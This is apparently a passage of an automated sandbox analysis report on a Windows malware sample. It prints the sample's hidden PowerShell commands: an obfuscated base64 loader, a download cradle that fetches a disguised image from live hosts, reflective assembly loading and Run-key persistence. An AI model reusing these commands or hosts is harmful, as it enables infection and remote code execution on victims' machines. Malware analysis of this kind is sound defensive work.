Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJ
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348B2ADD push FD8EC385h; ret 5_2_00007FFD348B2B92

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name.vbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
